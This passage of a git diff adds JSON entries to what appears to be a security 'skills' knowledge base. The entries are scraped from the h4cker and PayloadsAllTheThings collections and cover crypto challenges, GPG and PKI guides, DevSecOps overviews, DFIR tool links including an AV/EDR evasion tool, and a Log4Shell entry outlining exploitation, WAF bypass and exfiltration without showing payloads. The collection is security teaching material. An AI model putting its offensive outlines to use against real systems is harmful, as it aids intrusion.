+ "```python",
+ "def decrypt_caesar(ciphertext, shift):",
+ "decrypted = \"\""
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/01_Classic_Caesar_Cipher.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_a45132eef7b2.json b/skills/cryptography_and_pki_a45132eef7b2.json
new file mode 100644
index 0000000..4ed7270
--- /dev/null
+++ b/skills/cryptography_and_pki_a45132eef7b2.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_a45132eef7b2",
+ "category": "cryptography-and-pki",
+ "title": "gpg cheatsheet",
+ "description": "# GPG Quick Reference Cheat Sheet\n\n## Key Management\n\n### Generate Keys\n```bash\n# Interactive full key generation\ngpg --full-generate-key\n\n# Quick generation with defaults\ngpg --quick-generate-key \"Name \" rsa4096 encrypt,sign 2y\n\n# Generate ECC key\ngpg --quick-generate-key \"Name \" ed25519 sign 2y\n```\n\n### List Keys\n```bash\n# List public keys\ngpg --list-keys\ngpg -k\n\n# List secret keys\ngpg --list-secret-keys\ngpg -K\n\n# Show fingerprints\ngpg --fingerprint\ngpg --fingerprint KEY_ID\n```\n\n",
+ "payloads": [
+ "# GPG Quick Reference Cheat Sheet",
+ "## Key Management",
+ "### Generate Keys",
+ "```bash",
+ "# Interactive full key generation",
+ "gpg --full-generate-key",
+ "# Quick generation with defaults",
+ "gpg --quick-generate-key \"Name \" rsa4096 encrypt,sign 2y",
+ "# Generate ECC key",
+ "gpg --quick-generate-key \"Name \" ed25519 sign 2y",
+ "### List Keys",
+ "```bash",
+ "# List public keys",
+ "gpg --list-keys",
+ "gpg -k"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/quick-reference/gpg-cheatsheet.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_ad2a91f6673f.json b/skills/cryptography_and_pki_ad2a91f6673f.json
new file mode 100644
index 0000000..7b1b566
--- /dev/null
+++ b/skills/cryptography_and_pki_ad2a91f6673f.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_ad2a91f6673f",
+ "category": "cryptography-and-pki",
+ "title": "05 Implement Diffie Hellman Key Exchange",
+ "description": "# Challenge 5: Implement Diffie-Hellman Key Exchange\n\n**Level:** Intermediate\n\n**Description:**\nSimulate the Diffie-Hellman key exchange algorithm to securely share a symmetric key between two parties.\n\n**Challenge Text:**\n```\nGiven prime p = 23, base g = 5\nParty A's private key: 6\nParty B's private key: 15\n```\n\n**Instructions:**\n1. Compute Party A's and Party B's public keys.\n2. Compute the shared secret key for both parties.\n3. Validate that both parties have the same shared secret key.\n\n\n**An",
+ "payloads": [
+ "# Challenge 5: Implement Diffie-Hellman Key Exchange",
+ "**Level:** Intermediate",
+ "**Description:**",
+ "Simulate the Diffie-Hellman key exchange algorithm to securely share a symmetric key between two parties.",
+ "**Challenge Text:**",
+ "Given prime p = 23, base g = 5",
+ "Party A's private key: 6",
+ "Party B's private key: 15",
+ "**Instructions:**",
+ "1. Compute Party A's and Party B's public keys.",
+ "2. Compute the shared secret key for both parties.",
+ "3. Validate that both parties have the same shared secret key.",
+ "**Answer:**",
+ "Shared secret key: 2",
+ "**Code:**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/05_Implement_Diffie_Hellman_Key_Exchange.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_b85acd073d38.json b/skills/cryptography_and_pki_b85acd073d38.json
new file mode 100644
index 0000000..aab4353
--- /dev/null
+++ b/skills/cryptography_and_pki_b85acd073d38.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_b85acd073d38",
+ "category": "cryptography-and-pki",
+ "title": "lab 01 gpg basics",
+ "description": "# Lab 1: GPG Basics - Key Generation and File Encryption\n\n## Objectives\n- Generate a GPG key pair\n- Encrypt and decrypt files\n- Export and import keys\n- Understand key management\n\n## Prerequisites\n- Linux, macOS, or Windows with GPG installed\n- Terminal/command line access\n- Basic understanding of public key cryptography\n\n## Estimated Time\n30-45 minutes\n\n## Lab Steps\n\n### Step 1: Install GPG (if not already installed)\n\n**Linux (Debian/Ubuntu):**\n```bash\nsudo apt update\nsudo apt install gnupg\n```",
+ "payloads": [
+ "# Lab 1: GPG Basics - Key Generation and File Encryption",
+ "## Objectives",
+ "- Generate a GPG key pair",
+ "- Encrypt and decrypt files",
+ "- Export and import keys",
+ "- Understand key management",
+ "## Prerequisites",
+ "- Linux, macOS, or Windows with GPG installed",
+ "- Terminal/command line access",
+ "- Basic understanding of public key cryptography",
+ "## Estimated Time",
+ "30-45 minutes",
+ "## Lab Steps",
+ "### Step 1: Install GPG (if not already installed)",
+ "**Linux (Debian/Ubuntu):**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/labs/lab-01-gpg-basics.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_bb7bd3ffa2d6.json b/skills/cryptography_and_pki_bb7bd3ffa2d6.json
new file mode 100644
index 0000000..420757e
--- /dev/null
+++ b/skills/cryptography_and_pki_bb7bd3ffa2d6.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_bb7bd3ffa2d6",
+ "category": "cryptography-and-pki",
+ "title": "pki fundamentals",
+ "description": "# PKI Fundamentals: Complete Guide to Public Key Infrastructure\n\n## Table of Contents\n- [Introduction to PKI](#introduction-to-pki)\n- [Core Components](#core-components)\n- [Certificate Chains and Trust Models](#certificate-chains-and-trust-models)\n- [Certificate Authority Operations](#certificate-authority-operations)\n- [Certificate Lifecycle Management](#certificate-lifecycle-management)\n- [PKI Deployment Models](#pki-deployment-models)\n- [Security Best Practices](#security-best-practices)\n- [T",
+ "payloads": [
+ "# PKI Fundamentals: Complete Guide to Public Key Infrastructure",
+ "## Table of Contents",
+ "- [Introduction to PKI](#introduction-to-pki)",
+ "- [Core Components](#core-components)",
+ "- [Certificate Chains and Trust Models](#certificate-chains-and-trust-models)",
+ "- [Certificate Authority Operations](#certificate-authority-operations)",
+ "- [Certificate Lifecycle Management](#certificate-lifecycle-management)",
+ "- [PKI Deployment Models](#pki-deployment-models)",
+ "- [Security Best Practices](#security-best-practices)",
+ "- [Troubleshooting Common Issues](#troubleshooting-common-issues)",
+ "## Introduction to PKI",
+ "Public Key Infrastructure (PKI) is a framework of policies, procedures, hardware, software, and people used to create, manage, distribute, use, store, and revoke digital certificates and manage public-key encryption.",
+ "### Why PKI Matters",
+ "- **Authentication**: Verify the identity of communicating parties",
+ "- **Confidentiality**: Ensure data is encrypted and protected"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/tutorials/pki-fundamentals.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_d3a9d90be223.json b/skills/cryptography_and_pki_d3a9d90be223.json
new file mode 100644
index 0000000..cc73d0a
--- /dev/null
+++ b/skills/cryptography_and_pki_d3a9d90be223.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_d3a9d90be223",
+ "category": "cryptography-and-pki",
+ "title": "crypto frameworks",
+ "description": "# Crypto Frameworks and Libraries\n\n### C Programming Language\n\n- [crypto-algorithms](https://github.com/B-Con/crypto-algorithms) - Basic implementations of standard cryptography algorithms, like AES and SHA-1.\n- [libgcrypt](http://directory.fsf.org/wiki/Libgcrypt) - Cryptographic library developed as a separated module of GnuPG.\n- [libsodium](https://github.com/jedisct1/libsodium) - Modern and easy-to-use crypto library.\n- [libtomcrypt](https://github.com/libtom/libtomcrypt) - Fairly comprehensi",
+ "payloads": [
+ "# Crypto Frameworks and Libraries",
+ "### C Programming Language",
+ "- [crypto-algorithms](https://github.com/B-Con/crypto-algorithms) - Basic implementations of standard cryptography algorithms, like AES and SHA-1.",
+ "- [libgcrypt](http://directory.fsf.org/wiki/Libgcrypt) - Cryptographic library developed as a separated module of GnuPG.",
+ "- [libsodium](https://github.com/jedisct1/libsodium) - Modern and easy-to-use crypto library.",
+ "- [libtomcrypt](https://github.com/libtom/libtomcrypt) - Fairly comprehensive, modular and portable cryptographic toolkit.",
+ "- [libVES.c](https://github.com/vesvault/libVES.c) - End-to-end encrypted sharing via cloud repository, secure recovery through a viral network of friends in case of key loss.",
+ "- [milagro-crypto-c](https://github.com/apache/incubator-milagro-crypto-c) - Small, self-contained and fast open source crypto library. It supports RSA, ECDH, ECIES, ECDSA, AES-GCM, SHA2, SHA3 and Pairing-Based Cryptography.",
+ "- [monocypher](https://monocypher.org) - small, portable, easy to use crypto library inspired by libsodium and TweetNaCl.",
+ "- [NaCl](https://nacl.cr.yp.to/) - High-speed library for network communication, encryption, decryption, signatures, etc.",
+ "- [OpenSSL](https://github.com/openssl/openssl) - TLS/SSL and crypto library.",
+ "- [PolarSSL](https://tls.mbed.org/) - PolarSSL makes it trivially easy for developers to include cryptographic and SSL/TLS capabilities in their (embedded) products, facilitating this functionality with a minimal coding footprint.",
+ "- [RHash](https://github.com/rhash/RHash) - Great utility for computing hash sums.",
+ "- [themis](https://github.com/cossacklabs/themis) - High level crypto library for storing data (AES), secure messaging (ECC + ECDSA / RSA + PSS + PKCS#7) and session-oriented, forward secrecy data exchange (ECDH key agreement, ECC & AES encryption). Ported on many languages and platforms, suitable for client-server infastructures.",
+ "- [tiny-AES128-C](https://github.com/kokke/tiny-AES128-C) - Small portable AES128 in C."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/crypto_frameworks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_e5aeb8476372.json b/skills/cryptography_and_pki_e5aeb8476372.json
new file mode 100644
index 0000000..48d9042
--- /dev/null
+++ b/skills/cryptography_and_pki_e5aeb8476372.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_e5aeb8476372",
+ "category": "cryptography-and-pki",
+ "title": "02 Diffie Hellman Key Exchange",
+ "description": "# Challenge 2: Simple RSA Encryption\n\n**Challenge Text:**\n```\nn = 3233, e = 17, Encrypted message: [2201, 2332, 1452]\n```\n\n**Instructions:**\n1. Factorize the value of \\( n \\) into two prime numbers, \\( p \\) and \\( q \\).\n2. Compute the private key \\( d \\) using the Extended Euclidean Algorithm.\n3. Decrypt the message using the computed private key.\n\n### Answer:\n\n\n\n\n",
+ "payloads": [
+ "# Challenge 2: Simple RSA Encryption",
+ "**Challenge Text:**",
+ "n = 3233, e = 17, Encrypted message: [2201, 2332, 1452]",
+ "**Instructions:**",
+ "1. Factorize the value of \\( n \\) into two prime numbers, \\( p \\) and \\( q \\).",
+ "2. Compute the private key \\( d \\) using the Extended Euclidean Algorithm.",
+ "3. Decrypt the message using the computed private key.",
+ "### Answer:",
+ "",
+ "Code snippet in Python to perform the entire decryption:",
+ "```python",
+ "def egcd(a, b):",
+ "if a == 0:",
+ "return (b, 0, 1)",
+ "g, x, y = egcd(b % a, a)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/02_Diffie_Hellman_Key_Exchange.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_ea4c168b7a0e.json b/skills/cryptography_and_pki_ea4c168b7a0e.json
new file mode 100644
index 0000000..7f5efa8
--- /dev/null
+++ b/skills/cryptography_and_pki_ea4c168b7a0e.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_ea4c168b7a0e",
+ "category": "cryptography-and-pki",
+ "title": "post quantum migration",
+ "description": "# Post-Quantum Cryptography Migration Guide\n\n## Table of Contents\n- [Introduction](#introduction)\n- [Understanding the Quantum Threat](#understanding-the-quantum-threat)\n- [NIST Post-Quantum Standards](#nist-post-quantum-standards)\n- [Migration Strategy](#migration-strategy)\n- [Hybrid Approaches](#hybrid-approaches)\n- [Implementation Examples](#implementation-examples)\n- [Testing and Validation](#testing-and-validation)\n- [Timeline and Roadmap](#timeline-and-roadmap)\n\n## Introduction\n\n### The Qu",
+ "payloads": [
+ "# Post-Quantum Cryptography Migration Guide",
+ "## Table of Contents",
+ "- [Introduction](#introduction)",
+ "- [Understanding the Quantum Threat](#understanding-the-quantum-threat)",
+ "- [NIST Post-Quantum Standards](#nist-post-quantum-standards)",
+ "- [Migration Strategy](#migration-strategy)",
+ "- [Hybrid Approaches](#hybrid-approaches)",
+ "- [Implementation Examples](#implementation-examples)",
+ "- [Testing and Validation](#testing-and-validation)",
+ "- [Timeline and Roadmap](#timeline-and-roadmap)",
+ "## Introduction",
+ "### The Quantum Computing Threat",
+ "Quantum computers, when sufficiently powerful, will break current public-key cryptography systems:",
+ "**Vulnerable Algorithms:**",
+ "- \u274c RSA (all key sizes)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/tutorials/post-quantum-migration.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_edf931997f9d.json b/skills/cryptography_and_pki_edf931997f9d.json
new file mode 100644
index 0000000..4bb0d9a
--- /dev/null
+++ b/skills/cryptography_and_pki_edf931997f9d.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_edf931997f9d",
+ "category": "cryptography-and-pki",
+ "title": "DIRECTORY STRUCTURE",
+ "description": "# Directory Structure\n\nThis document provides an overview of the cryptography-and-pki directory organization.\n\n## \ud83d\udcc1 Directory Tree\n\n```\ncryptography-and-pki/\n\u2502\n\u251c\u2500\u2500 README.md # Main entry point with navigation\n\u251c\u2500\u2500 DIRECTORY_STRUCTURE.md # This file - directory overview\n\u2502\n\u251c\u2500\u2500 \ud83d\udcda Core Reference Files\n\u2502 \u251c\u2500\u2500 crypto_algorithms.md # Algorithm reference (2025 edition)\n\u2502 \u251c\u2500\u2500 crypto_tools.md # 100+ cryptography tools\n\u2502 \u251c\u2500\u2500 crypto_framework",
+ "payloads": [
+ "# Directory Structure",
+ "This document provides an overview of the cryptography-and-pki directory organization.",
+ "## \ud83d\udcc1 Directory Tree",
+ "cryptography-and-pki/",
+ "\u251c\u2500\u2500 README.md # Main entry point with navigation",
+ "\u251c\u2500\u2500 DIRECTORY_STRUCTURE.md # This file - directory overview",
+ "\u251c\u2500\u2500 \ud83d\udcda Core Reference Files",
+ "\u2502 \u251c\u2500\u2500 crypto_algorithms.md # Algorithm reference (2025 edition)",
+ "\u2502 \u251c\u2500\u2500 crypto_tools.md # 100+ cryptography tools",
+ "\u2502 \u251c\u2500\u2500 crypto_frameworks.md # Multi-language crypto libraries",
+ "\u2502 \u251c\u2500\u2500 cert_openssl.md # OpenSSL certificate operations",
+ "\u2502 \u251c\u2500\u2500 gpg_how_to.md # Complete GPG guide",
+ "\u2502 \u2514\u2500\u2500 disk_encryption.md # Disk and data encryption guide",
+ "\u251c\u2500\u2500 \ud83d\udcd6 tutorials/ # In-depth guides",
+ "\u2502 \u251c\u2500\u2500 pki-fundamentals.md # PKI complete guide"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/DIRECTORY_STRUCTURE.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_eef5a0f85534.json b/skills/cryptography_and_pki_eef5a0f85534.json
new file mode 100644
index 0000000..e874bb7
--- /dev/null
+++ b/skills/cryptography_and_pki_eef5a0f85534.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_eef5a0f85534",
+ "category": "cryptography-and-pki",
+ "title": "crypto tools",
+ "description": "# Cryptography Ethical Hacking Tools\nThe following list includes some of the most popular tools to test crypto implementations.\n\n\n
The password hash",
+ "payloads": [
+ "# Cryptography Ethical Hacking Tools",
+ "The following list includes some of the most popular tools to test crypto implementations.",
+ "
"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/crypto_tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_fa36235d19d1.json b/skills/cryptography_and_pki_fa36235d19d1.json
new file mode 100644
index 0000000..eb78909
--- /dev/null
+++ b/skills/cryptography_and_pki_fa36235d19d1.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_fa36235d19d1",
+ "category": "cryptography-and-pki",
+ "title": "gpg how to",
+ "description": "# Complete GPG Guide: Keys, Encryption, and Trust Management\n\nThis comprehensive guide covers GPG (GNU Privacy Guard) operations from basic key generation to advanced trust management, key server interactions, and secure backup procedures. GPG provides robust encryption, digital signatures, and key management capabilities essential for secure communications.\n\n## Table of Contents\n- [Key Generation](#generating-gpg-keys)\n- [File Encryption/Decryption](#encrypting-and-decrypting-files)\n- [Key Serv",
+ "payloads": [
+ "# Complete GPG Guide: Keys, Encryption, and Trust Management",
+ "This comprehensive guide covers GPG (GNU Privacy Guard) operations from basic key generation to advanced trust management, key server interactions, and secure backup procedures. GPG provides robust encryption, digital signatures, and key management capabilities essential for secure communications.",
+ "## Table of Contents",
+ "- [Key Generation](#generating-gpg-keys)",
+ "- [File Encryption/Decryption](#encrypting-and-decrypting-files)",
+ "- [Key Server Operations](#key-server-interaction)",
+ "- [Web of Trust](#digital-signatures-and-web-of-trust)",
+ "- [Backup and Recovery](#backup-and-recovery-procedures)",
+ "- [Advanced Operations](#advanced-operations)",
+ "- [Security Best Practices](#security-best-practices)",
+ "## Generating GPG Keys",
+ "### Installation",
+ "**Linux (Debian/Ubuntu):**",
+ "```bash",
+ "sudo apt update && sudo apt install gnupg"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/gpg_how_to.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_fc940e22445f.json b/skills/cryptography_and_pki_fc940e22445f.json
new file mode 100644
index 0000000..73c31d8
--- /dev/null
+++ b/skills/cryptography_and_pki_fc940e22445f.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_fc940e22445f",
+ "category": "cryptography-and-pki",
+ "title": "crypto algorithms reference",
+ "description": "# Cryptographic Algorithms Quick Reference\n\n## Algorithm Status Guide\n\n### Legend\n- \u2705 **Recommended**: Use in new deployments\n- \u26a0\ufe0f **Transitional**: Plan to migrate away\n- \u274c **Deprecated**: Do not use for new systems\n- \ud83d\udd2e **Post-Quantum**: Quantum-resistant\n\n## Symmetric Encryption\n\n### Block Ciphers\n\n| Algorithm | Key Size | Status | Notes |\n|-----------|----------|--------|-------|\n| AES-256 | 256-bit | \u2705 | Industry standard, hardware accelerated |\n| AES-192 | 192-bit | \u2705 | Good balance of secu",
+ "payloads": [
+ "# Cryptographic Algorithms Quick Reference",
+ "## Algorithm Status Guide",
+ "### Legend",
+ "- \u2705 **Recommended**: Use in new deployments",
+ "- \u26a0\ufe0f **Transitional**: Plan to migrate away",
+ "- \u274c **Deprecated**: Do not use for new systems",
+ "- \ud83d\udd2e **Post-Quantum**: Quantum-resistant",
+ "## Symmetric Encryption",
+ "### Block Ciphers",
+ "| Algorithm | Key Size | Status | Notes |",
+ "|-----------|----------|--------|-------|",
+ "| AES-256 | 256-bit | \u2705 | Industry standard, hardware accelerated |",
+ "| AES-192 | 192-bit | \u2705 | Good balance of security and performance |",
+ "| AES-128 | 128-bit | \u26a0\ufe0f | Quantum vulnerable (64-bit effective security) |",
+ "| ChaCha20 | 256-bit | \u2705 | Excellent for software-only implementations |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/quick-reference/crypto-algorithms-reference.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cve_exploits-1dd62d63bf46.json b/skills/cve_exploits-1dd62d63bf46.json
new file mode 100644
index 0000000..a32a48b
--- /dev/null
+++ b/skills/cve_exploits-1dd62d63bf46.json
@@ -0,0 +1,27 @@
+{
+ "id": "cve_exploits-1dd62d63bf46",
+ "category": "CVE Exploits",
+ "title": "Log4Shell",
+ "description": "# CVE-2021-44228 Log4Shell\n\n> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled\n\n## Summary\n\n* [Vulnerable code](#vulnerable-code)\n* [Payloads](#payloads)\n* [Scanning](#scanning)\n* [WAF Bypass](#waf-bypass)\n* [Exploi",
+ "payloads": [
+ "# CVE-2021-44228 Log4Shell",
+ "> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled",
+ "## Summary",
+ "* [Vulnerable code](#vulnerable-code)",
+ "* [Payloads](#payloads)",
+ "* [Scanning](#scanning)",
+ "* [WAF Bypass](#waf-bypass)",
+ "* [Exploitation](#exploitation)",
+ "* [Environment variables exfiltration](#environment-variables-exfiltration)",
+ "* [Remote Command Execution](#remote-command-execution)",
+ "* [References](#references)",
+ "## Vulnerable code",
+ "You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn](",
+ "https://github.com/leonjza/log4jpwn)",
+ "```java"
+ ],
+ "source": "PayloadsAllTheThings",
+ "references": [
+ "PayloadsAllTheThings/CVE Exploits/Log4Shell.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/devsecops_183c1ab6f897.json b/skills/devsecops_183c1ab6f897.json
new file mode 100644
index 0000000..2d62a86
--- /dev/null
+++ b/skills/devsecops_183c1ab6f897.json
@@ -0,0 +1,27 @@
+{
+ "id": "devsecops_183c1ab6f897",
+ "category": "devsecops",
+ "title": "devsecops pipelines",
+ "description": "# Overview of DevSecOps Pipelines\n\nDevSecOps, short for Development, Security, and Operations, is a philosophy that integrates security practices within the DevOps process. DevSecOps pipelines are designed to automate and embed security at every phase of the software development lifecycle. The key stages:\n\n1. **Planning and Analysis**\n - Identify security requirements and constraints.\n - Perform threat modeling to understand potential risks.\n - Define security policies and standards.\n\n2. *",
+ "payloads": [
+ "# Overview of DevSecOps Pipelines",
+ "DevSecOps, short for Development, Security, and Operations, is a philosophy that integrates security practices within the DevOps process. DevSecOps pipelines are designed to automate and embed security at every phase of the software development lifecycle. The key stages:",
+ "1. **Planning and Analysis**",
+ "- Identify security requirements and constraints.",
+ "- Perform threat modeling to understand potential risks.",
+ "- Define security policies and standards.",
+ "2. **Development and Coding**",
+ "- Implement secure coding practices.",
+ "- Use pre-approved security libraries and components.",
+ "- Conduct regular code reviews with a focus on security.",
+ "3. **Continuous Integration (CI)**",
+ "- Automate code scanning for vulnerabilities using Static Application Security Testing (SAST).",
+ "- Run unit tests to ensure code quality.",
+ "- Build artifacts securely and store them in a secure repository.",
+ "4. **Continuous Deployment (CD)**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/devsecops/devsecops_pipelines.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/devsecops_afe51e1336f0.json b/skills/devsecops_afe51e1336f0.json
new file mode 100644
index 0000000..54cf8d3
--- /dev/null
+++ b/skills/devsecops_afe51e1336f0.json
@@ -0,0 +1,27 @@
+{
+ "id": "devsecops_afe51e1336f0",
+ "category": "devsecops",
+ "title": "securing code and applications",
+ "description": "# Securing Code and Applications\n\n## 1. Secure Coding Practices\n\n- **Code Review**: Regular and systematic examination of the source code to identify and fix vulnerabilities.\n - Manual Reviews: Involves human experts analyzing the code.\n - Automated Scanning: Utilizes tools to detect common security issues.\n\n- **Static and Dynamic Analysis**:\n - Static Application Security Testing (SAST): Analyzes source code, bytecode, or application binaries to find vulnerabilities without executing the cod",
+ "payloads": [
+ "# Securing Code and Applications",
+ "## 1. Secure Coding Practices",
+ "- **Code Review**: Regular and systematic examination of the source code to identify and fix vulnerabilities.",
+ "- Manual Reviews: Involves human experts analyzing the code.",
+ "- Automated Scanning: Utilizes tools to detect common security issues.",
+ "- **Static and Dynamic Analysis**:",
+ "- Static Application Security Testing (SAST): Analyzes source code, bytecode, or application binaries to find vulnerabilities without executing the code.",
+ "- Dynamic Application Security Testing (DAST): Tests the running application to find vulnerabilities that may not be visible in the code but can be exploited.",
+ "- **Threat Modeling**: Identifying potential threats and designing countermeasures. It includes:",
+ "- Identifying assets and their value.",
+ "- Determining potential threats and vulnerabilities.",
+ "- Defining countermeasures to mitigate risks.",
+ "## 2. Application Security",
+ "- **Authentication and Authorization**:",
+ "- Authentication: Verifying the identity of users, systems, or services."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/devsecops/securing_code_and_applications.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/devsecops_cab2d5c500e0.json b/skills/devsecops_cab2d5c500e0.json
new file mode 100644
index 0000000..401fda8
--- /dev/null
+++ b/skills/devsecops_cab2d5c500e0.json
@@ -0,0 +1,27 @@
+{
+ "id": "devsecops_cab2d5c500e0",
+ "category": "devsecops",
+ "title": "building devsecops pipelines",
+ "description": "# Building DevSecOps Pipelines\n\n## 1. **Integration of Security into DevOps**\n - **Collaboration**: Foster collaboration between development, security, and operations teams.\n - **Security as Code**: Define security policies and procedures as code to ensure consistency and automation.\n\n## 2. **Continuous Integration and Continuous Deployment (CI/CD) with Security**\n - **Automated Testing**: Implement automated security testing within CI/CD pipelines.\n - **Secure Artifact Management**: Ens",
+ "payloads": [
+ "# Building DevSecOps Pipelines",
+ "## 1. **Integration of Security into DevOps**",
+ "- **Collaboration**: Foster collaboration between development, security, and operations teams.",
+ "- **Security as Code**: Define security policies and procedures as code to ensure consistency and automation.",
+ "## 2. **Continuous Integration and Continuous Deployment (CI/CD) with Security**",
+ "- **Automated Testing**: Implement automated security testing within CI/CD pipelines.",
+ "- **Secure Artifact Management**: Ensure that build artifacts are securely handled and stored.",
+ "## 3. **Security Automation Tools**",
+ "- **Security Scanners**: Utilize tools like SAST and DAST for automated vulnerability scanning.",
+ "- **Configuration Management**: Use tools like Ansible or Puppet to ensure secure configurations.",
+ "## 4. **Monitoring and Incident Response**",
+ "- **Real-time Monitoring**: Implement monitoring solutions to detect security incidents.",
+ "- **Automated Response**: Create automated response procedures for common security events.",
+ "## 5. **Continuous Improvement**",
+ "- **Feedback Loops**: Establish feedback mechanisms to continuously improve security practices."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/devsecops/building_devsecops_pipelines.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/dfir_637d332140d2.json b/skills/dfir_637d332140d2.json
new file mode 100644
index 0000000..1b0cc7b
--- /dev/null
+++ b/skills/dfir_637d332140d2.json
@@ -0,0 +1,27 @@
+{
+ "id": "dfir_637d332140d2",
+ "category": "dfir",
+ "title": "tools",
+ "description": "# Dfir Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [AMIRA - Automated Malware Incident Response & Analysis](http://feedproxy.google.com/~r/PentestTools/~3/n9b89NWONDo/amira-automated-malware-incident.html)\n- [APT-Hunter - Threat Hunting Tool For Windows Event Logs Which Made By Purple Team Mindset To Provide Detect APT Movements Hidden In The Sea Of Windows Event Logs To Decrease The Time To Uncover Suspicious Activity](http://feedproxy.google.com/~r/PentestTools/~3/I7LH",
+ "payloads": [
+ "# Dfir Tools",
+ "This is a curated list of tools for this category.",
+ "- [AMIRA - Automated Malware Incident Response & Analysis](http://feedproxy.google.com/~r/PentestTools/~3/n9b89NWONDo/amira-automated-malware-incident.html)",
+ "- [APT-Hunter - Threat Hunting Tool For Windows Event Logs Which Made By Purple Team Mindset To Provide Detect APT Movements Hidden In The Sea Of Windows Event Logs To Decrease The Time To Uncover Suspicious Activity](http://feedproxy.google.com/~r/PentestTools/~3/I7LH1j1n2kY/apt-hunter-threat-hunting-tool-for.html)",
+ "- [Acheron - Indirect Syscalls For AV/EDR Evasion In Go Assembly](https://www.kitploit.com/2023/05/acheron-indirect-syscalls-for-avedr.html)",
+ "- [Adama - Searches For Threat Hunting And Security Analytics](http://feedproxy.google.com/~r/PentestTools/~3/Lw8c0rtzWHk/adama-searches-for-threat-hunting-and.html)",
+ "- [Andriller - Software Utility With A Collection Of Forensic Tools For Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/CGAtcMHkN58/andriller-software-utility-with.html)",
+ "- [Attack Monitor - Endpoint Detection And Malware Analysis Software](http://feedproxy.google.com/~r/PentestTools/~3/_RxX4yOr-Ts/attack-monitor-endpoint-detection-and.html)",
+ "- [AutoMacTC - Automated Mac Forensic Triage Collector](http://feedproxy.google.com/~r/PentestTools/~3/todwtrFFW70/automactc-automated-mac-forensic-triage.html)",
+ "- [Autotimeliner - Automagically Extract Forensic Timeline From Volatile Memory Dump](http://www.kitploit.com/2022/02/autotimeliner-automagically-extract.html)",
+ "- [AzureHunter - A Cloud Forensics Powershell Module To Run Threat Hunting Playbooks On Data From Azure And O365](http://www.kitploit.com/2021/11/azurehunter-cloud-forensics-powershell.html)",
+ "- [Beagle - An Incident Response And Digital Forensics Tool Which Transforms Security Logs And Data Into Graphs](http://feedproxy.google.com/~r/PentestTools/~3/cEy42c_u1ck/beagle-incident-response-and-digital.html)",
+ "- [CIRTKit - Tools For The Computer Incident Response Team](http://feedproxy.google.com/~r/PentestTools/~3/w0zubUkg6ms/cirtkit-tools-for-computer-incident.html)",
